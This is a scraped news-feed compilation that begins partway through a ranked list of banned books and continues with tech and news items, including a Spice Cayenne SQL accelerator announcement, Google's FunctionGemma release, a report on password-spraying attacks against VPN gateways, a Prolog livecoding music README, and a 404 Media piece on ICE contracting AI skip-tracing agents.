Michael L. Printz Award honor book

30 (tie). I Am Not Your Perfect Mexican Daughter , by Erika L. Sánchez. 68 bans.

After a tragic accident kills her seemingly perfect sister, Julia is left to piece her family together and live up to a seemingly impossible ideal.

No. 1 New York Times bestseller
National Book Award finalist

30 (tie). Last Night at the Telegraph Club , by Malinda Lo. 68 bans.

This National Book Award-winning novel is set in 1954, at the height of the Red Scare, when 17-year-old Lily Hu visits a lesbian bar called the Telegraph Club.

National Book Award winner
New York Times bestseller
Stonewall Book Award winner

**32 (tie). Speak , by Laurie Halse Anderson. 67 bans.**

With more than 3.5 million copies sold and translated into 35 languages, Speak is a modern classic about a girl who stops speaking after a sexual assault.

National Book Award finalist
Michael L. Printz Honor book
New York Times bestseller
Major motion picture

**32 (tie). A Court of Silver Flames , by Sarah J. Maas. 67 bans.**

Another book in the Court of Thorns and Roses series, A Court of Silver Flames follows Feyre’s sister Nesta in a romance set against the sweeping backdrop of a world seared by war.

No. 1 bestselling author

34. Kingdom of Ash , by Sarah J. Maas. 66 bans.

The finale of the Throne of Glass series features Aelin Galathynius trapped in brutal captivity by her enemy.

No. 1 bestselling author

35. Breathless , by Jennifer Niven. 65 bans.

In this coming-of-age love story, Claudine Henry is coping with her parents’ divorce and getting ready for college when she meets a local trail guide with a mysterious past.

#1 New York Times bestselling author

36 (tie). The Color Purple , by Alice Walker. 62 bans.

The Color Purple depicts the lives of African American women in early 20th century rural Georgia through sisters Celie and Nettie, separated as girls but connected across time.

Pulitzer Prize
National Book Award
Two major motion pictures
Broadway musical

36 (tie). Flamer , by Mike Curato. 62 bans.

In Mike Curato’s debut graphic novel, Aiden is away at summer camp, navigating the changes of adolescence and his own identity.

Lambda Literary Award
One of Kirkus Reviews’ best books of the 21st century

36 (tie). Monday’s Not Coming , by Tiffany D. Jackson. 62 bans.

When Claudia’s best friend Monday stops coming to school, she seems to be the only one to notice. How can a teenage girl just disappear?

Bestselling and award-winning author

39. The Haters , by Jesse Andrews. 61 bans.

After Camryn Lane publishes her first book, the disturbing messages begin. Is it a disgruntled reader, or someone she knows?

Bestselling author

40 (tie). Beyond Magenta: Transgender Teens Speak Out , by Susan Kuklin. 60 bans.

Author and photographer Susan Kunklin interviewed six transgender or nonbinary teens navigating their gender identities.

Stonewall Honor book

**40 (tie). Milk and Honey , by Rupi Kaur. 60 bans.**

“#1 New York Times bestseller milk and honey is a collection of poetry and prose about survival. About the experience of violence, abuse, love, loss, and femininity.”

**40 (tie). Perfect , by Ellen Hopkins. 60 bans.**

What would four teens give up to be perfect? Four characters explore their own ideas of perfection – whether it’s having a perfect face and body or scoring the perfect home run.

New York Times bestseller

**40 (tie). Fallout , by Ellen Hopkins. 60 bans.**

The conclusion to the New York Times bestselling Crank trilogy.

**44 (tie). Slaughterhouse-Five, by Kurt Vonnegut** . 59 bans.

Centering on the infamous World War II firebombing of Dresden, this American classic anti-war novel stems from what Vonnegut saw as a prisoner of war.

One of Modern Library’s 100 best novels of all time
One of The Atlantic ’s Great American Novels of the Past 100 Years

**44 (tie). What Girls Are Made Of , by Elana K. Arnold. 59 bans.**

In the aftermath of a breakup, Nina revisits regretful moments in her life and the strange memories that left a mark.

National Book Award finalist

**46. Drama: A Graphic Novel , by Raina Telgemeier. 57 bans.**

Raina Telgemeier explores the drama – on stage and off – surrounding a middle-school musical.

Stonewall Book Award Honor
Bestselling author
Eisner Award-winning author

**47 (tie). The Carnival at Bray , by Jessie Ann Foley . 56 bans.**

When 16-year-old Maggie Lynch’s mother uproots them from Chicago to a tiny town in Ireland, Maggie struggles to adjust.

Printz Honor winner
William C. Morris Award finalist

**47 (tie). Wicked: The Life and Times of the Wicked Witch of the West , by Gregory Maguire . 56 bans.**

The bestselling reimagined prequel to The Wonderful Wizard of Oz launched one of the highest grossing Broadway musicals of all time and a two-part movie sensation.

#1 New York Times bestseller
Tony Award-winning Broadway musical
Golden Globe-winning movie

**49. Impulse , by Ellen Hopkins. 54 bans.**

Three teens’ lives collide at a mental hospital after each has attempted suicide.

Bestselling author

**50 (tie). Shine, by Lauren Myracle . 52 bans.**

In this young adult mystery novel, a teenage girl named Cat investigates a brutal anti-gay hate crime.

**50 (tie). The Sun and Her Flowers, by Rupi Kaur . 52 bans.**

Kaur’s second book of poetry also debuted at No. 1 on bestseller lists.

**50 (tie). I Know Why the Caged Bird Sings, by Maya Angelou** . 52 bans.

Maya Angelou’s memoir is considered an American classic.

Named one of the top 100 nonfiction books by the American Library Association
National Book Award finalist
New York Times bestseller
Basis of documentary film And Still I Rise

Show HN: Spice Cayenne – SQL acceleration built on Vortex

Hacker News

spice.ai

2025-12-18 19:00:56

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Original Article

Introducing Spice Cayenne: The Next-Generation Data Accelerator Built on Vortex for Performance and Scale

TLDR

Spice Cayenne is the next-generation Spice.ai data accelerator built for high-scale and low latency data lake workloads. It combines the Vortex columnar format with an embedded metadata engine to deliver faster queries and significantly lower memory usage than existing Spice data accelerators, including DuckDB and SQLite. Watch the demo for an overview of Spice Cayenne and Vortex.

Introduction

Spice.ai is a modern, open-source SQL query engine that enables development teams to federate, accelerate, search, and integrate AI across distributed data sources. It’s designed for enterprises building data-intensive applications and AI agents across disparate, tiered data infrastructure. Data acceleration of disparate and disaggregated data sources is foundational across many vertical use cases the Spice platform enables.

Spice leans into the industry shift to object storage as the primary source of truth for applications. These object store workloads are often multi-terabyte datasets using open data lake formats like Parquet, Iceberg, or Delta that must serve data and search queries for customer-facing applications with sub-second performance. Spice data acceleration , which transparently materializes working sets of data in embedded databases like DuckDB and SQLite, is the core technology that makes these applications built on object storage functional. Embedded data accelerators are fast and simple for datasets up to 1TB, however for multi-terabyte workloads, a new class of accelerator is required.

So we built Spice Cayenne , the next-generation data accelerator for high volume and latency-sensitive applications.

Spice Cayenne combines Vortex , the next-generation columnar file format from the Linux Foundation, with a simple, embedded metadata layer. This separation of concerns ensures that both the storage and metadata layers are fully optimized for what each does best. Cayenne delivers better performance and lower memory consumption than the existing DuckDB, Arrow, SQLite, and PostgreSQL data accelerators.

This post explains why we built Spice Cayenne, how it works, when it makes sense to use instead of existing acceleration options, and how to get started.

How data acceleration works in Spice

Spice accelerates datasets by materializing them in local compute engines; which can be ApacheDataFusion + Apache Arrow, SQLite, or DuckDB, in-memory or on-disk. This provides applications with high-performance, low-latency queries and dynamic compute flexibility beyond static materialization. It also reduces network I/O, avoids repeated round-trips to downstream data sources, and as a result, accommodates applications that need to access disparate data, join that data, and make it really fast. By bringing frequently accessed working sets of data closer to the application, Spice delivers sub-second, often single-digit millisecond queries without requiring additional clusters, ingestion pipelines, or ETL.

To support the wide range of enterprise workloads run on Spice, the platform includes multiple acceleration engines suited to different data shapes, query patterns, and performance needs. The Spice ethos is to offer optionality: development teams can choose the engine that best fits their requirements. These are currently the following acceleration engines :

PostgreSQL: PostgreSQL is great for row-oriented workloads, but is not optimized for high-volume columnar analytics.
Arrow (in-memory): Arrow is ideal for workloads that need very fast in-memory access and low-latency scans. The tradeoff is that data isn’t persisted to disk and more sophisticated operations like indexes aren’t supported.
DuckDB: DuckDB offers excellent all-around performance for medium-sized datasets and analytical queries. Single file limits and memory usage, however, can become a constraint as data volume grows beyond a terabyte.
SQLite: SQLite is a lightweight option that excels for smaller tables and row-based lookups. SQLite’s single-writer model, file single limits, and limited parallelism make it less ideal for larger or analytical workflows.

Why we built Spice Cayenne

Enterprise workloads on multi-terabyte datasets stored in object storage share a common set of pressure points; the volume of data continues to increase, more applications and services are querying the same accelerated tables at once, and teams need consistently fast performance without having to manage extra infrastructure.

Existing accelerators perform well at smaller scale but run into challenges at different inflection points:

Single-file architectures create bottlenecks for concurrency and updates.
Memory usage of embedded databases like DuckDB can be prohibitive.
Database and search index creation and storage can be prohibitive.

These constraints inspired us to develop the next-generation accelerator for petabyte-scale, that keeps metadata operations lightweight, and maintains low-latency, high-performance queries even as dataset sizes and concurrency increase. It also was critically important the underlying technologies aligned with the Spice philosophy of open-source with strong community support and governance.

Spice Cayenne addresses these requirements by separating metadata and data storage into two complementary layers: the Vortex columnar format and an embedded metadata engine.

Spice Cayenne architecture

Cayenne is built with two core concepts:

1. Data: Vortex Columnar Format

Data is stored in Vortex , the next-generation open-source, Apache-licensed format under the Linux Foundation.

Compared with Apache Parquet, Vortex provides:

100x faster random access
10–20x faster full scans
5x faster writes
Zero-copy compatibility with Apache Arrow
Pluggable compression, encoding, and layout strategies

Source: Vortex Github

Vortex has a clean separation of logical schema and physical layout, which Cayenne leverages to support efficient segment-level access, minimize memory pressure, and extend functionality without breaking compatibility. It draws on years of academic and systems research including innovations from projects like YouTube's Procella, FSST, FastLanes, ALP/G-ALP, and MonetDB/X100 to push the boundaries of what’s possible in open-source analytics.

Extensible and community-driven, Vortex is already integrated with tools like Apache Arrow, DataFusion, and DuckDB, and is designed to support Apache Iceberg in future releases. It’s also the foundation of commercial offerings from SpiralDB and PolarSignals . Since version 0.36.0, Vortex guarantees backward compatibility of the file format.

2. Metadata Layer

Cayenne stores metadata in an embedded database. SQLite is supported today, but aligned with the Spice philosophy of optionality, the design is extensive for pluggable metadata backends in the future. Cayenne’s metadata layer was intentionally designed as simple as possible, optimizing for maximum ACID performance.

The metadata layer includes:

Schemas
Snapshots
File tracking
Statistics
Refreshes

All metadata access is done through standard SQL transactions. This provides:

A single, local source of truth
Fast metadata reads
Consistent ACID semantics
No external catalog servers
No scattered metadata files

A single SQL query retrieves all metadata needed for query planning. This eliminates round-trip calls to object storage, supports file-pruning, and reduces sensitivity to storage throttling.

Together, the metadata engine and Vortex format enable Cayenne to scale beyond the limits of single-file engines while keeping acceleration operationally simple.

Benchmarks

So, how does Spice Cayenne stack up to the other accelerators?

We benchmarked Cayenne against DuckDB v1.4.2 using industry standard benchmarks (TPC-H SF100 and ClickBench), comparing both query performance and memory efficiency. All tests ran on a 16 vCPU / 64 GiB RAM instance (AWS c6i.8xlarge equivalent) with local NVMe storage. Cayenne was tested with Spice v1.9.0 .

***Cayenne accelerated TPC-H queries 1.4x faster than DuckDB (file mode)*** *and used* ***nearly 3x less memory*** .

***Cayenne was 14% faster than DuckDB file mode, and used 3.4x less memory.***

Spice Cayenne achieves faster query times and drastically lower memory usage by pairing a purpose-built execution engine with the Vortex columnar format. Unlike DuckDB, Cayenne avoids monolithic file dependencies and high memory spikes, making it ideal for production-grade acceleration at scale.

Getting started with Spice Cayenne

Use Cayenne by specifying engine: cayenne in the Spicepod.yml (dataset configuration).

Following are a few example configurations.

Basic:

datasets:
  - from: spice.ai:path.to.my_dataset
    name: my_dataset
    acceleration:
      engine: cayenne
      mode: file

Full configuration:

version: v1
kind: Spicepod
name: cayenne-example

datasets: 
  -  from: s3://my-bucket/data/
     name: analytics_data
     params: 
        file_format: parquet
     acceleration:
        engine: cayenne
        enabled: true
        refresh_mode: full
        refresh_check_interval: 1h

Memory

Memory usage depends on dataset size, query patterns, and caching configuration. Vortex’s design reduces memory overhead by using selective segment reads and zero-copy access.

Storage

Disk space is required for:

Vortex columnar data
Temporary files during query execution
Metadata tables

Provision storage according to dataset size and refresh patterns.

Roadmap

Spice Cayenne is in beta and still evolving. We encourage users to test Cayenne in development environments before deploying to production.

Upcoming improvements include:

Index support
Improved snapshot bootstrapping
Additional metadata backends
Advanced compression and encoding strategies
Expanded data type coverage

The goal for Spice Cayenne stable is for Cayenne to be the fastest, most efficient accelerator across the full range of analytical and operational data and AI workloads at terabyte & petabyte-scale.

Conclusion

Spice Cayenne represents a step function improvement in Spice data acceleration, designed to serve multi-terabyte, high concurrency, and low-latency workflows with predictable operations. By pairing an embedded metadata engine with Vortex’s high-performance format, Cayenne offers a scalable alternative to single-file accelerators while keeping configuration simple.

Spice Cayenne is available in beta. We welcome feedback on the road to its stable release.

‍

How China built its ‘Manhattan Project’ to rival the West in AI chips

Hacker News

www.japantimes.co.jp

2025-12-18 18:55:34

Comments...

Original Article

SINGAPORE –

In a high-security Shenzhen laboratory, Chinese scientists have built what Washington has spent years trying to prevent: a prototype of a machine capable of producing the cutting-edge semiconductor chips that power artificial intelligence, smartphones and weapons central to Western military dominance.

Completed in early 2025 and now undergoing testing, the prototype fills nearly an entire factory floor. It was built by a team of former engineers from Dutch semiconductor giant ASML who reverse-engineered the company’s extreme ultraviolet lithography machines (EUVs), according to two people with knowledge of the project.

EUV machines sit at the heart of a technological Cold War. They use beams of extreme ultraviolet light to etch circuits thousands of times thinner than a human hair onto silicon wafers, currently a capability monopolized by the West. The smaller the circuits, the more powerful the chips.

FunctionGemma 270M Model

Hacker News

blog.google

2025-12-18 18:26:52

Comments...

Original Article

We’re releasing a specialized version of our Gemma 3 270M model fine-tuned for function calling and a training recipe for users to specialize for even better performance.

Ravin Kumar

Research Engineer

FunctionGemma Logo text

It has been a transformative year for the Gemma family of models. In 2025, we have grown from 100 million to over 300 million downloads while demonstrating the transformative potential of open models , from defining state-of-the-art single-accelerator performance with Gemma 3 to advancing cancer research through the C2S Scale initiative .

Since launching the Gemma 3 270M model, the number one request we’ve received from developers is for native function calling capabilities. We listened, recognizing that as the industry shifts from purely conversational interfaces to active agents, models need to do more than just talk — they need to act. This is particularly compelling on-device, where agents can automate complex, multi-step workflows, from setting reminders to toggling system settings. To enable this at the edge, models must be lightweight enough to run locally and specialized enough to be reliable.

Today, we are releasing FunctionGemma, a specialized version of our Gemma 3 270M model tuned for function calling. It is designed as a strong base for further training into custom, fast, private, local agents that translate natural language into executable API actions.

FunctionGemma acts as a fully independent agent for private, offline tasks, or as an intelligent traffic controller for larger connected systems. In this role, it can handle common commands instantly at the edge, while routing more complex tasks to models like Gemma 3 27B.

What makes FunctionGemma unique

Unified action and chat: FunctionGemma knows how to talk to both computers and humans. It can generate structured function calls to execute tools, then switch context to summarize the results in natural language for the user.
Built for customization: FunctionGemma is designed to be molded, not just prompted. In our "Mobile Actions" evaluation, fine-tuning transformed the model’s reliability, boosting accuracy from a 58% baseline to 85%. This confirms that for edge agents, a dedicated, trained specialist is an efficient path to production-grade performance.
Engineered for the edge: Small enough to run on edge devices like the NVIDIA Jetson Nano and mobile phones, the model uses Gemma’s 256k vocabulary to efficiently tokenize JSON and multilingual inputs. This makes it a strong base for fine-tuning in specific domains, reducing sequence length to ensure minimum latency and total user privacy.
Broad ecosystem support: The model is supported by popular tools across the entire workflow: fine-tune with Hugging Face Transformers , Unsloth , Keras or NVIDIA NeMo and deploy using LiteRT-LM , vLLM, MLX , Llama.cpp , Ollama , Vertex AI or LM Studio .

FunctionGemma accuracy on Mobile Actions dataset before and after fine-tuning on a held out eval set.

Bar Graph of FunctionGemma Accuracy on Mobile Actions before and after fine-tuning

When to choose FunctionGemma

FunctionGemma is the bridge between natural language and software execution. It is the right tool if:

You have a defined API surface: Your application has a defined set of actions (e.g., smart home, media, navigation).
You are ready to fine-tune: You need the consistent, deterministic behavior that comes from fine-tuning on specific data, rather than the variability of zero-shot prompting.
You prioritize local-first deployment: Your application requires near-instant latency and total data privacy, running efficiently within the compute and battery limits of edge devices.
You are building compound systems: You need a lightweight edge model to handle local actions, allowing your system to process common commands on-device and only query larger models (like Gemma 3 27B) for more complex tasks.

How to see it in action

Let's look at how these models transform actual user experiences. You can explore these capabilities in the Google AI Edge Gallery app through two distinct experiences: an interactive game and a developer challenge.

Mobile Actions fine tuning

This demo reimagines assistant interaction as a fully offline capability. Whether it’s " Create a calendar event for lunch tomorrow, " " Add John to my contacts " or " Turn on the flashlight, " the model parses the natural language and identifies the correct OS tool to execute the command. To unlock this agent, developers are invited to use our fine-tuning cookbook to build the model and load it onto their mobile device.

TinyGarden game demo

In this interactive mini-game, players use voice commands to manage a virtual plot of land. You might say, "Plant sunflowers in the top row and water them," and the model decomposes this into specific app functions like plantCrop or waterCrop targeting specific grid coordinates. This proves that a 270M model can handle multi-turn logic to drive custom game mechanics, on a mobile phone, without ever pinging a server.

FunctionGemma Physics Playground

Use natural language to solve fun physics simulation puzzles in a game that runs 100% locally in your browser , powered by FunctionGemma and Transformers.js!

Credit: @xenovacom on X

How to try FunctionGemma today

We are moving from an era of chatbots to an era of action. With FunctionGemma, that power now fits in your pocket.

Download: Get the model on Hugging Face or Kaggle .
Learn: Check out the guides on function calling templates , how to sequence the model with function responses and fine-tuning .
Explore: Download the updated Google AI Edge Gallery to try the demos.
Build: Access the Mobile Actions guide with a Colab notebook and dataset to train your own specialized agent.
Deploy: Easily publish your own models onto mobile devices using LiteRT-LM or use alongside larger models on Vertex AI or NVIDIA devices like RTX PRO and DGX Spark.

We can’t wait to see the unique, private, and ultra-fast experiences you unlock on-device.

Firefox will have an option to disable all AI features

Hacker News

mastodon.social

2025-12-18 18:18:30

Comments...

Original Article

GPT-5.2-Codex

Hacker News

openai.com

2025-12-18 18:14:48

Comments...

Original Article

The Queens DA Just Let Two Cops Charged With Preying on Sex Workers Walk

hellgate

hellgatenyc.com

2025-12-18 17:30:29

The DA made a big deal about indicting cops for robbing a sex worker this March. Last week, her office quietly let the case get dismissed....

Original Article

In March, two rookie NYPD officers made headlines after they were indicted by Queens District Attorney Melinda Katz for felony crimes, including robbing and groping an alleged sex worker in an apartment on Roosevelt Avenue the previous summer.

The details in the indictment are disturbing. On a night in July 2024, the two officers, Justin McMillan and Justin Colon, both with just a few months on the job, and working out of the 115th Precinct on Northern Boulevard, allegedly turned off their body-worn cameras and stole a key from a purported sex worker to an 89th Street apartment where they suspected sex work was taking place.

According to the indictment, hours after stealing the key, with their body cameras still turned off, the two cops entered the apartment, which was reportedly being used as a brothel, and McMillan allegedly robbed a woman in the apartment, taking cash from her purse, and then sexually assaulted her.

"They shut the lights off, went in with their flashlights on in the dark, took money from her and…McMillan groped her breast and her buttocks," Assistant District Attorney Christine Oliveri said in court during the indictment proceedings .

The woman immediately called 911 to report the incident, which set off the Internal Affairs Bureau investigation that ultimately resulted in the indictments of McMillan and Colon. The cops were charged with burglary and forcible touching. If found guilty, the two faced up to 15 years in prison.

At the time, DA Katz said that "the allegations in this case are an affront to the shield worn by the countless police officers who serve and protect the residents of this city."

In a statement after McMillan and Colon were arrested, NYPD Commissioner Jessica Tisch said, "Let me be perfectly clear: Any officer who violates their oath will be investigated, exposed, and held fully accountable. That standard will never change."

But the case against McMillan and Colon won't be going any further.

Give us your email to read the full story

Sign up now for our free newsletters.

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New password spraying attacks target Cisco, PAN VPN gateways

Bleeping Computer

www.bleepingcomputer.com

2025-12-18 17:27:25

An automated campaign is targeting multiple VPN platforms, with credential-based attacks being observed on Palo Alto Networks GlobalProtect and Cisco SSL VPN. [...]...

Original Article

New password spraying attacks target Cisco, PAN VPN gateways

An automated campaign is targeting multiple VPN platforms, with credential-based attacks being observed on Palo Alto Networks GlobalProtect and Cisco SSL VPN.

On December 11, threat monitoring platform GreyNoise observed the number of login attempts aimed at GlobalProtect portals peaked at 1.7 million during a period of 16 hours.

Collected data showed that the attacks originated from more than 10,000 unique IP addresses and were aimed at infrastructure located in the United States, Mexico, and Pakistan.

The malicious traffic originated almost entirely from the 3xK GmbH (Germany) IP space, indicating a centralized cloud infrastructure.

Based on researchers' observations, the threat actor reused common username and password combinations, and most of the requests were from a Firefox user agent that is uncommon for automated login activity through this provider.

"The consistency of the user agent, request structure, and timing suggests scripted credential probing designed to identify exposed or weakly protected GlobalProtect portals, rather than interactive access attempts or vulnerability exploitation," GreyNoise explains .

“This activity reflects continued pressure against enterprise VPN authentication endpoints, a pattern GreyNoise has observed repeatedly during periods of heightened attacker activity.”

**Activity targeting GlobalProtect portals**
*Source: GreyNoise*

On December 12, activity originating from the same hosting provider using the same TCP fingerprint started to probe Cisco SSL VPN endpoints.

GreyNoise monitors recorded a jump of unique attack IPs to 1,273, from the normal baseline of less than 200.

The activity constitutes the first large-scale use of 3xK-hosted IPs against Cisco SSL VPNs in the past 12 weeks.

In this case, too, the login payloads followed normal SSL VPN authentication flows, including CSRF handling, indicating automated credential attacks rather than exploits.

**Number of IP probing Cisco SSL VPN endpoints**
*Source: GreyNoise*

Yesterday, Cisco warned customers of a maximum-severity zero-day vulnerability (CVE-2025-20393) in Cisco AsyncOS that is actively exploited in attacks targeting Secure Email Gateway (SEG) and Secure Email and Web Manager (SEWM) appliances.

However, GreyNoise underlines that it found no evidence linking the observed activity to CVE-2025-20393.

A Palo Alto Networks spokesperson confirmed to BleepingComputer that they are aware of the activity. The company recommends users to use strong passwords and multi-factor authentication protection.

“We are aware of the credential-based activity reported by GreyNoise targeting VPN gateways, including GlobalProtect portals. This activity reflects automated credential probing and does not constitute a compromise of our environment or an exploitation of any Palo Alto Networks vulnerability," the Palo Alto Networks spokesperson said.

"Our investigation confirms that these are scripted attempts to identify weak credentials," they added.

Apart from the recommended Palo Alto Networks action, Grey Noise also advises administrators to audit network appliances, look for unexpected login attempts, and block known malicious IPs performing these probes.

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

dogalog: Prolog-based livecoding music environment

Lobsters

github.com

2025-12-18 17:23:07

Comments...

Original Article

Dogalog

Dogalog is a realtime Prolog-based livecoding music environment where you write logic rules to create algorithmic rhythmic patterns and melodies.

Code Live!

Features

Livecoding : Auto-evaluation with visual feedback - code changes apply automatically
State Preservation : Cycle counters and cooldowns persist across updates
Interactive Tutorial : Built-in 13-step guided tutorial for learning
PWA Support : Install as an app, works offline
Mobile-First : Touch-friendly UI optimized for all devices
Modular Architecture : Clean separation of concerns, all files <100 lines
Comprehensive Testing : 123 tests with 88%+ coverage

Quick Start

Open the dev server URL, click Tutorial to learn, or click Start and begin livecoding!

What are "rules"?

Rules are Prolog-like statements that define when sounds should play:

% Kick drum on every beat
event(kick, 60, 80, T) :- beat(T, 1).

% Snare on beats 2 and 4
event(snare, 60, 90, T) :- beat(T, 2).

% Hi-hats every 8th note
event(hat, 60, 70, T) :- every(T, 0.5).

The system asks event(Voice, Pitch, Velocity, Time) on every step and plays all matching results.

Builtin Predicates

Timing

beat(T, N) - Trigger on beat N (1 = downbeat, 2 = halfway, 4 = quarter notes)
every(T, Step) - Trigger at regular intervals (0.5 = twice per beat)
phase(T, N, K) - Trigger on phase K of N divisions
euc(T, K, N, B, R) - Euclidean rhythm (K hits over N steps)

Random & Variation

prob(P) - Succeed with probability P (0.0-1.0)
choose(List, X) - Pick random element
cycle(List, X) - Cycle through elements sequentially (stateful!)
pick(List, X) - Backtrack through all elements
rand(Min, Max, X) - Random float
randint(Min, Max, X) - Random integer

Musical

scale(Root, Mode, Degree, Oct, Midi) - Convert scale degree to MIDI note
chord(Root, Quality, Oct, Midi) - Generate chord tones
transpose(Note, Offset, Out) - Transpose by semitones

Logic & Control

within(T, Start, End) - Time range check (for song structure)
cooldown(Now, Last, Gap) - Prevent rapid retriggering
eq(A, B) , lt(A, B) , gt(A, B) - Comparisons
distinct(List) - Check all elements are unique
add(A, B, C) - Arithmetic
range(Start, End, Step, X) - Generate number sequences
rotate(List, Shift, OutList) - Rotate lists

Instruments

kick - Synthesized kick drum
snare - Noise-based snare
hat - Noise-based hi-hat
sine - Sine wave monosynth (use MIDI pitch)

Examples

Euclidean Rhythms

Four-on-the-floor with backbeat:

event(kick, 60, 100, T) :- euc(T, 4, 16, 4, 0).
event(snare, 60, 90, T) :- euc(T, 2, 16, 4, 4).

Complex polyrhythm:

event(kick, 60, 100, T) :- euc(T, 3, 8, 0.5, 0).
event(snare, 60, 80, T) :- euc(T, 5, 8, 0.5, 2).

Melodies with Scales

Pentatonic melody:

note(N) :- cycle([1, 3, 4, 5, 8], D), scale(60, minor_pent, D, 0, N).
event(sine, N, 70, T) :- every(T, 0.5), note(N).

Available modes: major , minor , dorian , phrygian , lydian , mixolydian , locrian , minor_pent , major_pent , blues , whole_tone , chromatic

Arpeggiated Chords

arp(N) :- chord(60, minor, 0, Notes), choose(Notes, N).
event(sine, N, 70, T) :- every(T, 0.25), arp(N).

Chord qualities: maj , min , dim , aug , sus2 , sus4 , maj7 , min7 , dom7 , dim7

Probability & Variation

Random velocities:

vel(V) :- choose([60, 80, 100], V).
event(hat, 60, V, T) :- every(T, 0.25), vel(V).

Sparse pattern:

event(snare, 60, 80, T) :- beat(T, 2), prob(0.3).

Song Structure with `within`

% Intro: just kick (beats 0-8)
event(kick, 60, 100, T) :- beat(T, 1).

% Verse: add snare (beats 8-16)
event(snare, 60, 80, T) :- beat(T, 2), within(T, 8, 16).

% Chorus: add melody (beats 16-24)
melody(N) :- scale(60, major, D, 0, N), cycle([1,3,5,8], D).
event(sine, N, 70, T) :- every(T, 0.5), melody(N), within(T, 16, 24).

Fills with `cooldown`

% Regular pattern
event(kick, 60, 100, T) :- beat(T, 1).

% Fill every 4+ bars
fill(T) :- beat(T, 1), cooldown(T, last_fill, 4).
event(snare, 60, V, T) :- fill(T), every(T, 0.25), choose([80,90,100], V).

Development

Build Commands

npm install          # Install dependencies
npm run dev          # Start dev server (http://localhost:5173)
npm run build        # Build for production
npm run preview      # Preview production build
npm test             # Run tests
npm run test:ui      # Run tests with UI
npm run test:coverage # Generate coverage report
npm run docs:html    # Build manual and cheatsheet

Project Structure

src/
├── prolog/          # Prolog engine
│   ├── builtins/    # Builtin predicates (modular)
│   ├── parser.js    # Parser
│   ├── resolution.js # SLD resolution with generators
│   ├── tokenizer.js # Tokenizer
│   ├── unify.js     # Unification
│   └── terms.js     # Term constructors
├── audio/           # WebAudio synthesis
│   └── audioEngine.js
├── scheduler/       # Timing and execution
│   ├── scheduler.js
│   ├── stateManager.js
│   └── transitionManager.js
├── livecoding/      # Auto-evaluation
│   ├── codeValidator.js
│   └── liveEvaluator.js
├── tutorial/        # Tutorial system
│   ├── tutorialManager.js
│   ├── tutorialOverlay.js
│   └── steps.js
├── ui/              # User interface
│   ├── components/  # Reusable components
│   ├── template.js
│   ├── controls.js
│   └── validationIndicator.js
├── help/            # Documentation
│   └── builtinDocs.js
├── config/          # Configuration
│   └── defaults.js
├── app.js           # Application orchestrator
└── main.js          # Entry point

Architecture

Prolog Engine : Custom implementation with SLD resolution using ES6 generators for backtracking
Livecoding : Debounced auto-evaluation (300ms) with syntax validation
State Management : Centralized state for cycle counters and cooldowns (persists across code updates)
Scheduler : Time-grid based (16th notes) with swing and lookahead support
Audio : WebAudio synthesis without samples - all sounds generated in real-time
UI : Mobile-first, progressive enhancement, DOM-based components

Testing

123 tests across 16 test files
Coverage: 88.52% statements, 90.42% functions
Integration tests for livecoding, state preservation, example loading
UI component tests with vitest + jsdom

PWA Features

Installable on mobile and desktop
Offline support with service worker
Caches all assets and documentation
Manifest with icons and theme colors

Documentation

Interactive Tutorial : Click "Tutorial" button in the app for 13 guided steps
Full Tutorial : Comprehensive guide teaching both Prolog and livecoding
Manual : Complete reference for all built-ins and syntax
Cheatsheet : Quick reference for common patterns
Live Demo : GitHub Pages

Technical Details

Livecoding Flow

User edits code in editor
After 300ms debounce, code is validated
If valid: parse → compile → swap program (with smooth transition)
State (cycles, cooldowns) persists across updates
Visual indicator shows validation state (green/red/yellow)

State Preservation

% This pattern's state persists when you edit other code:
drums(D) :- cycle([kick, snare, hat], D).
event(D, 60, 80, T) :- beat(T, 1), drums(D).

% Editing this won't reset the cycle counter!

Euclidean Rhythms

Euclidean rhythms distribute K hits as evenly as possible over N steps using the Euclidean algorithm. The result is musically interesting patterns used in music worldwide:

euc(T, 3, 8, 0.5, 0) - Tresillo pattern (Cuban music)
euc(T, 5, 8, 0.5, 0) - Cinquillo pattern
euc(T, 5, 12, 0.5, 0) - Common rock beat

Browser Support

Modern browsers with WebAudio API
Chrome/Edge 90+
Firefox 88+
Safari 14.1+
Mobile browsers (iOS Safari, Chrome Android)

License

MIT

Credits

Built with vanilla JavaScript, CodeMirror 6, and WebAudio API. Inspired by TidalCycles, Sonic Pi, and Datalog.

ICE Contracts Company Making Bounty Hunter AI Agents

403 Media

www.404media.co

2025-12-18 17:19:25

AI Solutions 87 says on its website its AI agents “deliver rapid acceleration in finding persons of interest and mapping their entire network.”...

Original Article

Immigration and Customs Enforcement (ICE) has paid hundreds of thousands of dollars to a company that makes “AI agents” to rapidly track down targets. The company claims the “skip tracing” AI agents help agencies find people of interest and map out their family and other associates more quickly. According to the procurement records, the company’s services were specifically for Enforcement and Removal Operations (ERO), the part of ICE that identifies, arrests, and deports people.

The contract comes as ICE is spending millions of dollars, and plans to spend tens of millions more , on skip tracing services more broadly. The practice involves ICE paying bounty hunters to use digital tools and physically stalk immigrants to verify their addresses, then report that information to ICE so the agency can act.

The contractor, AI Solutions 87, claims on its website that its agents “deliver rapid acceleration in finding persons of interest and mapping their entire network.” It says the AI agents map out a target’s “services, locations, friends, family, and associates.”

💡

Do you know anything else about the technology ICE is using? I would love to hear from you. Using a non-work device, you can message me securely on Signal at joseph.404 or send me an email at joseph@404media.co.

The website does not detail how exactly its AI agents work or what large language model, if any, they are based on. Typically AI agents are customized versions of commercially available AI tools, such as ChatGPT, that can go onto the wider internet and perform tasks for the user, such as generating sales leads or drafting emails. In this case, AI Solutions 87 is advertising its AI agents for locating people.

On Tuesday, ICE contracted with AI Solutions 87 for $636,500, according to public procurement records. The record says the contract is specifically for skip tracing services for ICE’s ERO, the agency’s main deportation arm. Another procurement record says AI Solutions 87 is providing ICE with “skip tracing services nationwide.”

AI Solutions 87 did not respond to a request for comment on how its AI agents work. ICE did not respond to a request for comment on whether the agency specifically bought AI Solutions 87’s AI agent product.

Screenshot from AI Solutions 87's website.

In October, the Intercept reported on ICE’s intention to use bounty hunters or skip tracers to find targets. The skip tracing industry usually works on insurance fraud or finding people who skipped bail. Private investigators and skip tracers 404 Media spoke to had mixed reactions to ICE’s plan of using private industry in this context, with one being concerned and another saying they would do the work.

